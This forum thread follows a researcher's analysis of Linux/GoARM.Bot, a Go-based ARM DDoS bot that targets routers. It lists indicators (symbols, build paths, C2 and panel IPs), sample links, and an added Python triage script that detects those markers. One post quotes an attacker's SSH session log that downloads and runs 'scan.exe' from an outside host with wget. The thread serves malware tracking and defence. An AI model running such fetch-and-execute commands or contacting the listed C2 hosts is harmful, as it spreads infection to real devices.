Linux/GoARM.Bot


Linux/GoARM.Bot

Postby unixfreaxjp » Wed Sep 17, 2014 6:55 am

This GOARM binary was reported to me: https://www.virustotal.com/en/file/81c9 ... 410603481/ Many downloads:
It's an ARM architecture bot, based on Go programming, compiled for Armv6 with Crypto and Encoding libs. Go projects PoC:
Code:
// go runtime..
0x29B39C   runtime.selectgo
0x2AB1EC   runtime.gogo
(etc)
// go project..
0x31A3D1   /Users/fc/GoProjects/armv6/src/server2/server.go
0x31A403   /Users/fc/GoProjects/armv6/src/server2/message.pb.go
0x31A439   /Users/fc/GoProjects/armv6/src/server2/client.go
0x31BDE1   /Users/fc/GoProjects/armv6/src/main.go
// Go source codes:
 %3d: t=%3d start
 %3d: t=%3d bytes [%d]
 %3d: t=%3d end err %v
 %3d: t=%3d fix32 %d
 %3d: t=%3d fix64 %d
 %3d: t=%3d varint %d
 %3d: fetching op err %v
 %3d: t=%3d fix32 err %v
 %3d: t=%3d fix64 err %v
 %3d: t=%3d start err %v
 %3d: t=%3d unknown wire=%d
 %3d: t=%3d varint err %v
 %3d: t=%3d end
 %3d: start-end not balanced %d

HTTP send template:
Code:
%s %s HTTP/1.1
User-Agent: %s
; Domain=%s
; Path=%s
; Expires=%s
; Max-Age=%d
Host: %s
^^ Spotted together with the DDoS'er tools. Feel free to verdict this further :D
Last edited by unixfreaxjp on Wed Sep 17, 2014 8:45 am, edited 1 time in total.
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89
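Added here as a triage example (not code from the post, nor from the sample's author): a Python script that checks a file for a 32-bit ARM ELF header and for the Go runtime symbols, build paths, protobuf decoding debug strings and HTTP template quoted in the post above. The sample blob it runs over is constructed inline, not a real binary.

```python
import struct

# Marker strings taken from the post above: Go runtime symbols, the author's
# build paths, protobuf wire-decoding debug strings and the HTTP send template.
GO_RUNTIME = [b"runtime.selectgo", b"runtime.gogo"]
GO_PROJECT = [b"/GoProjects/armv6/src/server2/", b"/GoProjects/armv6/src/main.go"]
PB_DEBUG = [b"start-end not balanced", b"unknown wire=", b"fetching op err"]
HTTP_TMPL = [b"User-Agent: %s", b"; Max-Age=%d", b"Host: %s"]
EM_ARM = 40  # e_machine value for ARM in the ELF header


def elf_is_arm32(blob: bytes) -> bool:
    """True if blob starts with a 32-bit little-endian ELF header for ARM."""
    if len(blob) < 20 or blob[:4] != b"\x7fELF":
        return False
    if blob[4] != 1 or blob[5] != 1:  # EI_CLASS=ELFCLASS32, EI_DATA=ELFDATA2LSB
        return False
    (e_machine,) = struct.unpack_from("<H", blob, 18)  # e_machine at offset 18
    return e_machine == EM_ARM


def triage(blob: bytes) -> dict:
    """Score a file against the markers; a GoARM.Bot-like file hits all groups."""
    hits = {
        "arm32_elf": elf_is_arm32(blob),
        "go_runtime": all(m in blob for m in GO_RUNTIME),
        "go_project": any(m in blob for m in GO_PROJECT),
        "pb_debug": sum(m in blob for m in PB_DEBUG) >= 2,
        "http_template": all(m in blob for m in HTTP_TMPL),
    }
    hits["match"] = (hits["arm32_elf"] and hits["go_runtime"]
                     and (hits["go_project"] or hits["pb_debug"])
                     and hits["http_template"])
    return hits


def make_sample() -> bytes:
    """Constructed stand-in for a sample: an ARM32 ELF header plus the strings."""
    hdr = b"\x7fELF" + bytes([1, 1, 1, 0, 0]) + b"\x00" * 7  # 16-byte e_ident
    hdr += struct.pack("<HH", 2, EM_ARM)  # e_type=ET_EXEC, e_machine=EM_ARM
    hdr += b"\x00" * 32  # remainder of the 52-byte ELF32 header, unused here
    body = b"\x00".join(GO_RUNTIME + [
        b"/Users/fc/GoProjects/armv6/src/server2/server.go",
        b" %3d: start-end not balanced %d", b" %3d: t=%3d unknown wire=%d",
        b"%s %s HTTP/1.1\nUser-Agent: %s\n; Max-Age=%d\nHost: %s\n"])
    return hdr + body


if __name__ == "__main__":
    print(triage(make_sample()))
```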

Re: Linux/GoARM.Bot

Postby unixfreaxjp » Wed Sep 17, 2014 7:54 am

Another sample, different source: https://www.virustotal.com/en/file/27d4 ... 410939480/
So it is used by other infections too.. It is official then, new malware: Linux/GoARM.Bot.
Naming explanation:
GO = GO language
ARM = specifically compiled for ARM..
Bot.. I can verdict the bot (backdoor) function and HTTP command, as well as the low-level functions (connections, calls), but I am still working on its DDoS function, so "Linux / GoARM.Bot" it is.
Last edited by unixfreaxjp on Wed Sep 17, 2014 12:20 pm, edited 1 time in total.

Re: Linux/GoARM.Bot

Postby unixfreaxjp » Wed Sep 17, 2014 8:25 am

Another sample, same source as the previous one: https://www.virustotal.com/en/file/c665 ... 410941384/ is actually the UPX-packed version of the previous post's sample.. viewtopic.php?f=16&t=3491#p23911

Re: Linux/GoARM.Bot

Postby unixfreaxjp » Thu Oct 02, 2014 3:48 pm

New sample; it looks like it was uploaded in mid-September 2014
https://www.virustotal.com/en/file/0e5a ... 412264434/
Sample is attached.

Re: Linux/GoARM.Bot

Postby unixfreaxjp » Tue Oct 14, 2014 2:12 pm

New sample TODAY uploads!!! :-))
https://www.virustotal.com/en/file/e315 ... 413295129/
thanks ben!
Comment: only idiots would expect to infect routers with pathetic internet connections using 3MB+ payloads..

Re: Linux/GoARM.Bot

Postby unixfreaxjp » Mon Oct 20, 2014 4:24 pm

New sample, quite big infection hits; this malware is specifically designed to aim for ARM devices.
VT: https://www.virustotal.com/en/file/5883 ... 413822096/ < thx to benkow
CNC:
Code:
222.186.56.102||23650 | 222.186.56.0/21 | CHINANET-JS-AS | CN | CHINATELECOM.COM.CN | CHINANET JIANGSU PROVINCE NETWORK

Re: Linux/GoARM.Bot

Postby unixfreaxjp » Sat Oct 25, 2014 6:32 pm


Re: Linux/GoARM.Bot

Postby unixfreaxjp » Sat Sep 19, 2015 7:59 am

New fresh one, attacking routers together with MrBLack & AESddos("hacker").
Sample: https://www.virustotal.com/en/file/3b6d ... /analysis/
cnc: 222.186.34.220, panel: 183.60.216.182, bruter(ssh): 60.166.61.110
Code:
2015-09-18 10:35:39 [session=78,ip=60.166.61.110] wget http://183.60.216.182:88/scan.exe
2015-09-18 10:35:44 [session=78,ip=60.166.61.110] chmod 777 scan.txt
2015-09-18 10:35:49 [session=78,ip=60.166.61.110] ./scan.exe &

Re: Linux/GoARM.Bot

Postby unixfreaxjp » Wed Sep 23, 2015 7:15 pm


Re: Linux/GoARM.Bot

Postby unixfreaxjp » Fri Sep 25, 2015 4:35 pm

8-) Now I am sure ChinaZ is behind these latest GoARM campaigns,
today's attack, with a stripped & static ARM(el) v7 ELF as the target, looks to be aiming at Ubuntu-based routers' default passwords..

And here it is:

Summarized:
Code:
#CHINAZ + #GoARMBot + static strip ARMel #ELF =aim #ROUTER
Atk(ssh): 14.29.32.162
Pnl: 111.206.76.35 (appdown.keyipin.com)
Cnc: 222.186.31.182:6004
Report: http://imgur.com/a/CKBPx <== BIG PICS IS HERE

Routers are not safe anymore.. yet let them come, I'm ready. :lol:

Just to confirm the CNC data for evidence, I took this pcap, but they close the port after several "greetings" beforehand:

Sample: https://www.virustotal.com/en/file/284a ... 443197004/
